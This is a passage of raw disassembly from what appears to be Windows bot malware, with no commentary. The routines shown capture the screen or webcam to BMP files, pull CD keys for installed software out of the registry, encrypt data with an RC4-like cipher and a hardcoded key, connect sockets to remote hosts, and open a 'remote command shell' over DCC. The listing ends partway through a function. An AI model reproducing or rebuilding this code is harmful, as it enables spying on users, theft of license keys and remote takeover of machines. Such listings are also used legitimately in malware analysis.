mov [ebp+var_1C], eax
jz loc_403B6C
push eax
push [ebp+var_4]
call dword_44B59C ; SelectObject
cmp eax, esi
jz loc_403B6C
cmp eax, 0FFFFFFFFh
jz loc_403B6C
push 0CC0020h
push esi
push esi
push edi
push [ebp+var_C]
push [ebp+var_8]
push esi
push esi
push [ebp+var_4]
call dword_44B708 ; BitBlt
test eax, eax
jz loc_403B6C
cmp ebx, esi
jz short loc_403A69
lea eax, [ebp+var_484]
push eax
push ebx
push esi
push [ebp+var_4]
call dword_44B5F0 ; GetDIBColorTable
mov ebx, eax
loc_403A69: ; CODE XREF: sub_403948+10B�j
mov edi, [ebp+var_10]
mov ecx, [ebp+var_8]
imul edi, [ebp+var_C]
imul edi, ecx
mov eax, ebx
push esi
shr edi, 3
shl eax, 2
mov [ebp+var_8], eax
push 80h
lea edx, [eax+edi+36h]
add eax, 36h
push 2
mov [ebp+var_26], eax
mov eax, [ebp+var_C]
push esi
push esi
push 40000000h
push [ebp+arg_0]
mov [ebp+var_50], eax
mov ax, word ptr [ebp+var_10]
mov [ebp+var_30], 4D42h
mov [ebp+var_2E], edx
mov [ebp+var_2A], si
mov [ebp+var_28], si
mov [ebp+var_58], 28h
mov [ebp+var_54], ecx
mov [ebp+var_4C], 1
mov [ebp+var_4A], ax
mov [ebp+var_48], esi
mov [ebp+var_44], esi
mov [ebp+var_40], esi
mov [ebp+var_3C], esi
mov [ebp+var_38], ebx
mov [ebp+var_34], esi
call ds:dword_4942EC
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_403B4C
lea ecx, [ebp+var_14]
push esi
push ecx
lea ecx, [ebp+var_30]
push 0Eh
push ecx
push eax
call ds:dword_4942E4
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_58]
push 28h
push eax
push [ebp+arg_0]
call ds:dword_4942E4
cmp ebx, esi
jz short loc_403B2E
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_484]
push [ebp+var_8]
push eax
push [ebp+arg_0]
call ds:dword_4942E4
loc_403B2E: ; CODE XREF: sub_403948+1CC�j
lea eax, [ebp+var_14]
push esi
push eax
push edi
push [ebp+var_18]
push [ebp+arg_0]
call ds:dword_4942E4
push [ebp+arg_0]
call ds:dword_4942E0
push 1
pop esi
loc_403B4C: ; CODE XREF: sub_403948+1A2�j
push [ebp+var_1C]
call dword_44B624 ; DeleteObject
push [ebp+var_4]
call dword_44B588 ; DeleteDC
mov edi, [ebp+var_20]
loc_403B61: ; CODE XREF: sub_403948+70�j
push edi
call dword_44B588 ; DeleteDC
mov eax, esi
jmp short loc_403B7E
; ---------------------------------------------------------------------------
loc_403B6C: ; CODE XREF: sub_403948+C7�j
; sub_403948+D9�j ...
push edi
call dword_44B588 ; DeleteDC
push [ebp+var_4]
call dword_44B588 ; DeleteDC
loc_403B7C: ; CODE XREF: sub_403948+23�j
xor eax, eax
loc_403B7E: ; CODE XREF: sub_403948+222�j
pop edi
pop esi
pop ebx
leave
retn
sub_403948 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B83 proc near ; CODE XREF: sub_40C50A+4709�p
var_34 = byte ptr -34h
var_20 = dword ptr -20h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
push 1
pop esi
xor ebx, ebx
push esi
push dword_449C74
push 78h
push 0A0h
push ebx
push ebx
push 40000000h
push offset aWindow ; "Window"
call dword_44B618
mov edi, eax
cmp edi, ebx
mov [ebp+var_4], edi
jnz short loc_403BC1
mov eax, esi
jmp loc_403D77
; ---------------------------------------------------------------------------
loc_403BC1: ; CODE XREF: sub_403B83+35�j
push edi
call dword_44B660 ; IsWindow
test eax, eax
jz short loc_403BDE
push ebx
push [ebp+arg_4]
push 40Ah
push edi
call dword_44B71C ; SendMessageA
jmp short loc_403BE0
; ---------------------------------------------------------------------------
loc_403BDE: ; CODE XREF: sub_403B83+47�j
xor eax, eax
loc_403BE0: ; CODE XREF: sub_403B83+59�j
cmp eax, ebx
jnz short loc_403BEB
loc_403BE4: ; CODE XREF: sub_403B83+88�j
; sub_403B83+BC�j
mov ebx, esi
jmp loc_403D6C
; ---------------------------------------------------------------------------
loc_403BEB: ; CODE XREF: sub_403B83+5F�j
push edi
call dword_44B660 ; IsWindow
test eax, eax
jz short loc_403C08
lea eax, [ebp+var_34]
push eax
push 2Ch
push 40Eh
push edi
call dword_44B71C ; SendMessageA
loc_403C08: ; CODE XREF: sub_403B83+71�j
cmp [ebp+var_20], ebx
jz short loc_403BE4
push edi
call dword_44B660 ; IsWindow
test eax, eax
mov edi, 42Ch
jz short loc_403C2E
push ebx
push ebx
push edi
push [ebp+var_4]
call dword_44B71C ; SendMessageA
mov [ebp+arg_4], eax
jmp short loc_403C31
; ---------------------------------------------------------------------------
loc_403C2E: ; CODE XREF: sub_403B83+98�j
mov [ebp+arg_4], ebx
loc_403C31: ; CODE XREF: sub_403B83+A9�j
push [ebp+arg_4]
call sub_416A10
cmp eax, ebx
pop ecx
mov [ebp+var_8], eax
jz short loc_403BE4
push [ebp+arg_4]
call sub_416A10
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_403C58
push 1
pop ebx
jmp loc_403D6C
; ---------------------------------------------------------------------------
loc_403C58: ; CODE XREF: sub_403B83+CB�j
push [ebp+var_4]
call dword_44B660 ; IsWindow
test eax, eax
jz short loc_403C75
push [ebp+var_8]
push [ebp+arg_4]
push edi
push [ebp+var_4]
call dword_44B71C ; SendMessageA
loc_403C75: ; CODE XREF: sub_403B83+E0�j
push [ebp+arg_4]
push [ebp+var_8]
push esi
call sub_418A00
mov ecx, [ebp+arg_8]
add esp, 0Ch
cmp ecx, ebx
jg short loc_403C90
mov ecx, 280h
loc_403C90: ; CODE XREF: sub_403B83+106�j
mov eax, [ebp+arg_C]
cmp eax, ebx
jg short loc_403C9C
mov eax, 1E0h
loc_403C9C: ; CODE XREF: sub_403B83+112�j
push [ebp+var_4]
mov [esi+4], ecx
mov [esi+8], eax
mov word ptr [esi+0Eh], 10h
mov [esi+14h], ebx
mov [esi+10h], ebx
mov [esi+20h], ebx
mov [esi+24h], ebx
mov word ptr [esi+0Ch], 1
mov [esi+28h], bl
mov [esi+29h], bl
mov [esi+2Ah], bl
mov [esi+2Bh], bl
call dword_44B660 ; IsWindow
test eax, eax
mov edi, 42Dh
jz short loc_403CE6
push esi
push [ebp+arg_4]
push edi
push [ebp+var_4]
call dword_44B71C ; SendMessageA
loc_403CE6: ; CODE XREF: sub_403B83+153�j
push [ebp+var_4]
call dword_44B660 ; IsWindow
test eax, eax
jz short loc_403D03
push ebx
push ebx
push 43Dh
push [ebp+var_4]
call dword_44B71C ; SendMessageA
loc_403D03: ; CODE XREF: sub_403B83+16E�j
push [ebp+var_4]
call dword_44B660 ; IsWindow
test eax, eax
jz short loc_403D22
push [ebp+arg_0]
push ebx
push 419h
push [ebp+var_4]
call dword_44B71C ; SendMessageA
loc_403D22: ; CODE XREF: sub_403B83+18B�j
push [ebp+var_4]
call dword_44B660 ; IsWindow
test eax, eax
jz short loc_403D3F
push [ebp+var_8]
push [ebp+arg_4]
push edi
push [ebp+var_4]
call dword_44B71C ; SendMessageA
loc_403D3F: ; CODE XREF: sub_403B83+1AA�j
push [ebp+var_8]
call sub_417480
push esi
call sub_417480
pop ecx
pop ecx
push [ebp+var_4]
call dword_44B660 ; IsWindow
test eax, eax
jz short loc_403D6C
push ebx
push ebx
push 40Bh
push [ebp+var_4]
call dword_44B71C ; SendMessageA
loc_403D6C: ; CODE XREF: sub_403B83+63�j
; sub_403B83+D0�j ...
push [ebp+var_4]
call dword_44B770 ; DestroyWindow
mov eax, ebx
loc_403D77: ; CODE XREF: sub_403B83+39�j
pop edi
pop esi
pop ebx
leave
retn
sub_403B83 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403D7C proc near ; CODE XREF: sub_40C50A+47C2�p
var_90 = byte ptr -90h
var_7C = dword ptr -7Ch
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 90h
push ebx
push esi
push edi
push 1
pop esi
xor ebx, ebx
push esi
push dword_449C74
push 78h
push 0A0h
push ebx
push ebx
push 40000000h
push offset aWindow_0 ; "Window"
call dword_44B618
mov edi, eax
cmp edi, ebx
jnz short loc_403DBA
mov eax, esi
jmp loc_403FB6
; ---------------------------------------------------------------------------
loc_403DBA: ; CODE XREF: sub_403D7C+35�j
push edi
call dword_44B660 ; IsWindow
test eax, eax
jz short loc_403DD7
push ebx
push [ebp+arg_4]
push 40Ah
push edi
call dword_44B71C ; SendMessageA
jmp short loc_403DD9
; ---------------------------------------------------------------------------
loc_403DD7: ; CODE XREF: sub_403D7C+47�j
xor eax, eax
loc_403DD9: ; CODE XREF: sub_403D7C+59�j
cmp eax, ebx
jnz short loc_403DE4
loc_403DDD: ; CODE XREF: sub_403D7C+8B�j
; sub_403D7C+BC�j
mov ebx, esi
jmp loc_403FAD
; ---------------------------------------------------------------------------
loc_403DE4: ; CODE XREF: sub_403D7C+5F�j
push edi
call dword_44B660 ; IsWindow
test eax, eax
jz short loc_403E04
lea eax, [ebp+var_90]
push eax
push 2Ch
push 40Eh
push edi
call dword_44B71C ; SendMessageA
loc_403E04: ; CODE XREF: sub_403D7C+71�j
cmp [ebp+var_7C], ebx
jz short loc_403DDD
push edi
call dword_44B660 ; IsWindow
test eax, eax
jz short loc_403E27
push ebx
push ebx
push 42Ch
push edi
call dword_44B71C ; SendMessageA
mov [ebp+arg_4], eax
jmp short loc_403E2A
; ---------------------------------------------------------------------------
loc_403E27: ; CODE XREF: sub_403D7C+96�j
mov [ebp+arg_4], ebx
loc_403E2A: ; CODE XREF: sub_403D7C+A9�j
push [ebp+arg_4]
call sub_416A10
cmp eax, ebx
pop ecx
mov [ebp+var_4], eax
jz short loc_403DDD
push [ebp+arg_4]
call sub_416A10
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_403E51
push 1
pop ebx
jmp loc_403FAD
; ---------------------------------------------------------------------------
loc_403E51: ; CODE XREF: sub_403D7C+CB�j
push edi
call dword_44B660 ; IsWindow
test eax, eax
jz short loc_403E6E
push [ebp+var_4]
push [ebp+arg_4]
push 42Ch
push edi
call dword_44B71C ; SendMessageA
loc_403E6E: ; CODE XREF: sub_403D7C+DE�j
push [ebp+arg_4]
push [ebp+var_4]
push esi
call sub_418A00
mov ecx, [ebp+arg_C]
add esp, 0Ch
cmp ecx, ebx
jg short loc_403E89
mov ecx, 0A0h
loc_403E89: ; CODE XREF: sub_403D7C+106�j
mov eax, [ebp+arg_10]
cmp eax, ebx
jg short loc_403E93
push 78h
pop eax
loc_403E93: ; CODE XREF: sub_403D7C+112�j
push edi
mov [esi+4], ecx
mov [esi+8], eax
mov word ptr [esi+0Eh], 10h
mov [esi+14h], ebx
mov [esi+10h], ebx
mov [esi+20h], ebx
mov [esi+24h], ebx
mov word ptr [esi+0Ch], 1
mov [esi+28h], bl
mov [esi+29h], bl
mov [esi+2Ah], bl
mov [esi+2Bh], bl
call dword_44B660 ; IsWindow
test eax, eax
jz short loc_403ED8
push esi
push [ebp+arg_4]
push 42Dh
push edi
call dword_44B71C ; SendMessageA
loc_403ED8: ; CODE XREF: sub_403D7C+14A�j
push edi
call dword_44B660 ; IsWindow
test eax, eax
jz short loc_403EF5
lea eax, [ebp+var_64]
push eax
push 60h
push 441h
push edi
call dword_44B71C ; SendMessageA
loc_403EF5: ; CODE XREF: sub_403D7C+165�j
push edi
mov [ebp+var_60], ebx
mov [ebp+var_3C], ebx
mov [ebp+var_38], ebx
mov [ebp+var_34], ebx
mov [ebp+var_30], 1
mov [ebp+var_2C], 5
mov [ebp+var_64], 1046Ah
call dword_44B660 ; IsWindow
test eax, eax
jz short loc_403F33
lea eax, [ebp+var_64]
push eax
push 60h
push 440h
push edi
call dword_44B71C ; SendMessageA
loc_403F33: ; CODE XREF: sub_403D7C+1A3�j
push edi
call dword_44B660 ; IsWindow
test eax, eax
jz short loc_403F4E
push [ebp+arg_0]
push ebx
push 414h
push edi
call dword_44B71C ; SendMessageA
loc_403F4E: ; CODE XREF: sub_403D7C+1C0�j
push edi
call dword_44B660 ; IsWindow
test eax, eax
jz short loc_403F67
push ebx
push ebx
push 43Eh
push edi
call dword_44B71C ; SendMessageA
loc_403F67: ; CODE XREF: sub_403D7C+1DB�j
push edi
call dword_44B660 ; IsWindow
test eax, eax
jz short loc_403F84
push [ebp+var_4]
push [ebp+arg_4]
push 42Dh
push edi
call dword_44B71C ; SendMessageA
loc_403F84: ; CODE XREF: sub_403D7C+1F4�j
push [ebp+var_4]
call sub_417480
push esi
call sub_417480
pop ecx
pop ecx
push edi
call dword_44B660 ; IsWindow
test eax, eax
jz short loc_403FAD
push ebx
push ebx
push 40Bh
push edi
call dword_44B71C ; SendMessageA
loc_403FAD: ; CODE XREF: sub_403D7C+63�j
; sub_403D7C+D0�j ...
push edi
call dword_44B770 ; DestroyWindow
mov eax, ebx
loc_403FB6: ; CODE XREF: sub_403D7C+39�j
pop edi
pop esi
pop ebx
leave
retn
sub_403D7C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403FBB proc near ; CODE XREF: sub_40C50A+5866�p
var_3F0 = byte ptr -3F0h
var_2EC = byte ptr -2ECh
var_EC = byte ptr -0ECh
var_6C = byte ptr -6Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 3F0h
push edi
xor edi, edi
cmp off_436904, edi
mov [ebp+var_8], 80h
jz loc_40416C
push ebx
push esi
mov eax, offset off_436904
mov esi, offset dword_436910
loc_403FE6: ; CODE XREF: sub_403FBB+1A9�j
lea ecx, [ebp+var_4]
push ecx
push 20019h
push edi
push dword ptr [eax]
push dword ptr [esi-10h]
call dword_44B730 ; RegOpenKeyExA
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_EC]
push eax
push edi
push edi
push dword ptr [esi-8]
push [ebp+var_4]
call dword_44B5CC ; RegQueryValueExA
test eax, eax
jnz loc_404152
mov eax, [esi]
cmp eax, edi
jz loc_404112
push eax
lea eax, [ebp+var_EC]
push eax
lea eax, [ebp+var_3F0]
push offset aSS ; "%s\\%s"
push eax
call sub_418D70
lea eax, [ebp+var_3F0]
push offset aR ; "r"
push eax
call sub_419D70
mov ebx, eax
add esp, 18h
cmp ebx, edi
jz loc_404152
loc_40405D: ; CODE XREF: sub_403FBB+C9�j
push ebx
lea eax, [ebp+var_6C]
push 64h
push eax
call sub_419B30
add esp, 0Ch
test eax, eax
jz loc_404109
push dword ptr [esi+4]
lea eax, [ebp+var_6C]
push eax
call sub_419AB0
pop ecx
test eax, eax
pop ecx
jnz short loc_40405D
push 3Dh
push dword ptr [esi+4]
call sub_4199F0
pop ecx
test eax, eax
pop ecx
jz short loc_4040C9
lea eax, [ebp+var_6C]
push offset asc_437BD8 ; "="
push eax
call sub_419890
push offset asc_437BDC ; "="
push edi
call sub_419890
push eax
lea eax, [ebp+var_2EC]
push dword ptr [esi-4]
push offset aSCdKeyS_ ; "%s CD Key: (%s)."
push eax
call sub_418D70
add esp, 20h
jmp short loc_4040E4
; ---------------------------------------------------------------------------
loc_4040C9: ; CODE XREF: sub_403FBB+D9�j
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_2EC]
push dword ptr [esi-4]
push offset aSCdKeyS__0 ; "%s CD Key: (%s)."
push eax
call sub_418D70
add esp, 10h
loc_4040E4: ; CODE XREF: sub_403FBB+10C�j
push edi
lea eax, [ebp+var_2EC]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
lea eax, [ebp+var_2EC]
push eax
call sub_4035E1
add esp, 18h
loc_404109: ; CODE XREF: sub_403FBB+B3�j
push ebx
call sub_419740
pop ecx
jmp short loc_404152
; ---------------------------------------------------------------------------
loc_404112: ; CODE XREF: sub_403FBB+65�j
lea eax, [ebp+var_EC]
push eax
lea eax, [ebp+var_2EC]
push dword ptr [esi-4]
push offset aSCdKeyS__1 ; "%s CD Key: (%s)."
push eax
call sub_418D70
push edi
lea eax, [ebp+var_2EC]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
lea eax, [ebp+var_2EC]
push eax
call sub_4035E1
add esp, 28h
loc_404152: ; CODE XREF: sub_403FBB+5B�j
; sub_403FBB+9C�j ...
push [ebp+var_4]
call dword_44B69C ; RegCloseKey
add esi, 18h
cmp [esi-0Ch], edi
lea eax, [esi-0Ch]
jnz loc_403FE6
pop esi
pop ebx
loc_40416C: ; CODE XREF: sub_403FBB+19�j
pop edi
leave
retn
sub_403FBB endp
; =============== S U B R O U T I N E =======================================
sub_40416F proc near ; CODE XREF: sub_4041AA+56�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov edx, [esp+arg_0]
push esi
or esi, 0FFFFFFFFh
test eax, eax
jz short loc_4041A4
push ebx
push edi
lea edi, [eax]
mov ecx, 0FFh
loc_404188: ; CODE XREF: sub_40416F+31�j
mov al, [edx]
mov ebx, esi
and eax, ecx
and ebx, ecx
xor eax, ebx
shr esi, 8
mov eax, ds:dword_43201C[eax*4]
xor esi, eax
inc edx
dec edi
jnz short loc_404188
pop edi
pop ebx
loc_4041A4: ; CODE XREF: sub_40416F+E�j
mov eax, esi
pop esi
not eax
retn
sub_40416F endp
; =============== S U B R O U T I N E =======================================
sub_4041AA proc near ; CODE XREF: sub_405084+24A�p
var_10 = dword ptr -10h
arg_0 = dword ptr 4
push ebx
push esi
xor ebx, ebx
push edi
push ebx
call sub_416A10
mov [esp+10h+var_10], offset aRb ; "rb"
push [esp+10h+arg_0]
mov esi, eax
call sub_419D70
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz short loc_4041F9
loc_4041CF: ; CODE XREF: sub_4041AA+4D�j
test byte ptr [edi+0Ch], 10h
jnz short loc_4041FD
inc ebx
push ebx
push esi
call sub_416EA0
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_4041F9
push edi
push 1
lea eax, [esi+ebx-1]
push 1
push eax
call sub_419D90
add esp, 10h
jmp short loc_4041CF
; ---------------------------------------------------------------------------
loc_4041F9: ; CODE XREF: sub_4041AA+23�j
; sub_4041AA+39�j
xor eax, eax
jmp short loc_404218
; ---------------------------------------------------------------------------
loc_4041FD: ; CODE XREF: sub_4041AA+29�j
dec ebx
push ebx
push esi
call sub_40416F
push esi
mov ebx, eax
call sub_417480
push edi
call sub_419740
add esp, 10h
mov eax, ebx
loc_404218: ; CODE XREF: sub_4041AA+51�j
pop edi
pop esi
pop ebx
retn
sub_4041AA endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 240h
push ebx
push esi
lea eax, [ebp-34h]
push edi
xor ebx, ebx
push eax
xor edi, edi
mov byte ptr [ebp-34h], 0Ah
mov byte ptr [ebp-33h], 0Eh
mov byte ptr [ebp-32h], 20h
mov byte ptr [ebp-31h], 48h
mov byte ptr [ebp-30h], 0Bh
mov byte ptr [ebp-2Fh], 2Bh
mov byte ptr [ebp-2Eh], 0Ch
mov byte ptr [ebp-2Dh], 23h
mov byte ptr [ebp-2Ch], 3Ah
mov byte ptr [ebp-2Bh], 27h
mov byte ptr [ebp-2Ah], 28h
mov byte ptr [ebp-29h], 5Eh
mov byte ptr [ebp-28h], 2Ah
mov byte ptr [ebp-27h], 1Eh
mov byte ptr [ebp-26h], 2Dh
mov byte ptr [ebp-25h], 5Ah
mov byte ptr [ebp-24h], 1Bh
mov byte ptr [ebp-23h], 0Fh
mov byte ptr [ebp-22h], 4Ch
mov byte ptr [ebp-21h], 44h
mov byte ptr [ebp-20h], 16h
mov byte ptr [ebp-1Fh], 4
mov byte ptr [ebp-1Eh], 57h
mov byte ptr [ebp-1Dh], 23h
mov byte ptr [ebp-1Ch], 11h
mov byte ptr [ebp-1Bh], 53h
mov byte ptr [ebp-1Ah], 38h
mov byte ptr [ebp-19h], 13h
mov byte ptr [ebp-18h], 0Dh
mov byte ptr [ebp-17h], 12h
mov byte ptr [ebp-16h], 25h
mov byte ptr [ebp-15h], 1Ch
mov byte ptr [ebp-14h], 30h
mov byte ptr [ebp-13h], 12h
mov byte ptr [ebp-12h], 50h
mov byte ptr [ebp-11h], 4Fh
mov byte ptr [ebp-10h], 39h
mov byte ptr [ebp-0Fh], 10h
mov byte ptr [ebp-0Eh], 42h
mov byte ptr [ebp-0Dh], 1Fh
mov byte ptr [ebp-0Ch], 37h
mov byte ptr [ebp-0Bh], 1Dh
mov byte ptr [ebp-0Ah], 41h
mov byte ptr [ebp-9], 55h
mov byte ptr [ebp-8], 2Ch
mov byte ptr [ebp-7], 41h
mov byte ptr [ebp-6], 2Ch
mov byte ptr [ebp-5], 58h
mov [ebp-4], bl
call sub_418E70
mov esi, 101h
mov [ebp-38h], eax
push esi
lea eax, [ebp-13Ch]
push ebx
push eax
call sub_4189A0
push esi
lea eax, [ebp-240h]
push ebx
push eax
call sub_4189A0
add esp, 1Ch
xor eax, eax
mov ecx, 100h
loc_404326: ; CODE XREF: .text:00404330�j
mov [ebp+eax-13Ch], al
inc eax
cmp eax, ecx
jb short loc_404326
cmp [ebp+14h], ebx
jz short loc_404355
xor eax, eax
loc_404339: ; CODE XREF: .text:00404351�j
cmp edi, [ebp+14h]
jnz short loc_404340
xor edi, edi
loc_404340: ; CODE XREF: .text:0040433C�j
mov edx, [ebp+10h]
mov dl, [edi+edx]
inc edi
mov [ebp+eax-240h], dl
inc eax
cmp eax, ecx
jb short loc_404339
jmp short loc_40436F
; ---------------------------------------------------------------------------
loc_404355: ; CODE XREF: .text:00404335�j
xor esi, esi
loc_404357: ; CODE XREF: .text:0040436D�j
cmp edi, [ebp-38h]
jnz short loc_40435E
xor edi, edi
loc_40435E: ; CODE XREF: .text:0040435A�j
mov al, [ebp+edi-34h]
inc edi
mov [ebp+esi-240h], al
inc esi
cmp esi, ecx
jb short loc_404357
loc_40436F: ; CODE XREF: .text:00404353�j
mov [ebp+14h], ebx
xor edi, edi
mov eax, 0FFh
loc_404379: ; CODE XREF: .text:004043B3�j
mov dl, [ebp+edi-13Ch]
mov ebx, [ebp+14h]
mov cl, [ebp+edi-240h]
lea esi, [ebp+edi-13Ch]
add ebx, edx
add ecx, ebx
and ecx, eax
inc edi
mov [ebp+14h], ecx
cmp edi, 100h
mov bl, [ebp+ecx-13Ch]
lea ecx, [ebp+ecx-13Ch]
mov [esi], bl
mov [ecx], dl
jb short loc_404379
xor edi, edi
cmp [ebp+0Ch], edi
mov [ebp+14h], edi
mov [ebp+10h], edi
jbe short loc_404411
loc_4043C2: ; CODE XREF: .text:0040440F�j
inc edi
and edi, eax
mov dl, [ebp+edi-13Ch]
lea ecx, [ebp+edi-13Ch]
mov bl, dl
add ebx, [ebp+14h]
and ebx, eax
mov esi, ebx
mov bl, [ebp+esi-13Ch]
mov [ebp+14h], esi
mov [ecx], bl
lea esi, [ebp+esi-13Ch]
mov ebx, [ebp+10h]
mov [esi], dl
mov cl, [ecx]
mov esi, [ebp+8]
add ecx, edx
and ecx, eax
add esi, ebx
mov cl, [ebp+ecx-13Ch]
xor [esi], cl
inc ebx
cmp ebx, [ebp+0Ch]
mov [ebp+10h], ebx
jb short loc_4043C2
loc_404411: ; CODE XREF: .text:004043C0�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404416 proc near ; CODE XREF: sub_40449C+33�p
; sub_404A02+BC�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
push 0
push 1
push 2
call dword_44B740 ; socket
mov edi, eax
or esi, 0FFFFFFFFh
cmp edi, esi
jz short loc_404492
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_4189A0
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+arg_4]
call dword_44B6C0 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call dword_44B700 ; inet_addr
cmp eax, esi
jnz short loc_404477
push [ebp+arg_0]
call dword_44B744 ; gethostbyname
test eax, eax
jz short loc_404492
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
loc_404477: ; CODE XREF: sub_404416+4B�j
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call dword_44B668 ; connect
cmp eax, esi
jnz short loc_404496
push edi
call dword_44B758 ; closesocket
loc_404492: ; CODE XREF: sub_404416+1B�j
; sub_404416+58�j
mov eax, esi
jmp short loc_404498
; ---------------------------------------------------------------------------
loc_404496: ; CODE XREF: sub_404416+73�j
mov eax, edi
loc_404498: ; CODE XREF: sub_404416+7E�j
pop edi
pop esi
leave
retn
sub_404416 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40449C proc near ; DATA XREF: sub_40C50A+A07�o
var_11B4 = byte ptr -11B4h
var_1B4 = byte ptr -1B4h
var_1AC = byte ptr -1ACh
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 11B4h
call sub_418D40
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1B4]
rep movsd
push 1
pop esi
push [ebp+var_14]
mov [eax+1B0h], esi
lea eax, [ebp+var_1AC]
push eax
call sub_404416
mov ebx, eax
pop ecx
cmp ebx, 0FFFFFFFFh
pop ecx
jnz short loc_40452F
lea eax, [ebp+var_11B4]
push offset aDccFailedToOpe ; "[DCC]: Failed to open socket."
push eax
call sub_418D70
xor edi, edi
pop ecx
cmp [ebp+var_8], edi
pop ecx
jnz short loc_404512
push edi
lea eax, [ebp+var_11B4]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push ebx
call sub_40842D
add esp, 14h
loc_404512: ; CODE XREF: sub_40449C+59�j
lea eax, [ebp+var_11B4]
push eax
call sub_4035E1
push [ebp+var_10]
call sub_416507
pop ecx
pop ecx
push esi
call ds:dword_4942FC
loc_40452F: ; CODE XREF: sub_40449C+3F�j
push offset dword_449CD8
push ebx
call sub_412E64
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_40459A
lea eax, [ebp+var_11B4]
push offset aDccFailedToO_0 ; "[DCC]: Failed to open remote command sh"...
push eax
call sub_418D70
xor edi, edi
pop ecx
cmp [ebp+var_8], edi
pop ecx
jnz short loc_404576
push edi
lea eax, [ebp+var_11B4]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push ebx
call sub_40842D
add esp, 14h
loc_404576: ; CODE XREF: sub_40449C+BD�j
lea eax, [ebp+var_11B4]
push eax
call sub_4035E1
pop ecx
push ebx
call dword_44B758 ; closesocket
push [ebp+var_10]
call sub_416507
pop ecx
push esi
call ds:dword_4942FC
loc_40459A: ; CODE XREF: sub_40449C+A3�j
push 64h
call ds:dword_4942D8
xor edi, edi
mov esi, 1000h
loc_4045A9: ; CODE XREF: sub_40449C+168�j
push esi
lea eax, [ebp+var_11B4]
push edi
push eax
call sub_4189A0
add esp, 0Ch
lea eax, [ebp+var_11B4]
push edi
push esi
push eax
push ebx
call dword_44B6D8 ; recv
test eax, eax
jle short loc_404606
lea eax, [ebp+var_11B4]
push offset asc_437C6C ; "\n"
push eax
call sub_419FB0
lea eax, [ebp+var_11B4]
push eax
call sub_412C50
add esp, 0Ch
test eax, eax
jz short loc_404606
push 64h
call ds:dword_4942D8
push 7
call sub_416433
test eax, eax
pop ecx
jnz short loc_4045A9
loc_404606: ; CODE XREF: sub_40449C+130�j
; sub_40449C+154�j
lea eax, [ebp+var_11B4]
push offset aDccFailedToSen ; "[DCC]: Failed to send to Remote command"...
push eax
call sub_418D70
cmp [ebp+var_8], edi
pop ecx
pop ecx
jnz short loc_404639
push edi
lea eax, [ebp+var_11B4]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push ebx
call sub_40842D
add esp, 14h
loc_404639: ; CODE XREF: sub_40449C+180�j
lea eax, [ebp+var_11B4]
push eax
call sub_4035E1
pop ecx
push ebx
call dword_44B758 ; closesocket
push [ebp+var_10]
call sub_416507
pop ecx
push edi
call ds:dword_4942FC
sub_40449C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40465D proc near ; DATA XREF: sub_40C50A+4A8A�o
var_A04 = byte ptr -0A04h
var_604 = byte ptr -604h
var_500 = dword ptr -500h
var_4FC = dword ptr -4FCh
var_3FC = byte ptr -3FCh
var_1FC = dword ptr -1FCh
var_1F8 = dword ptr -1F8h
var_1E0 = byte ptr -1E0h
var_DC = byte ptr -0DCh
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
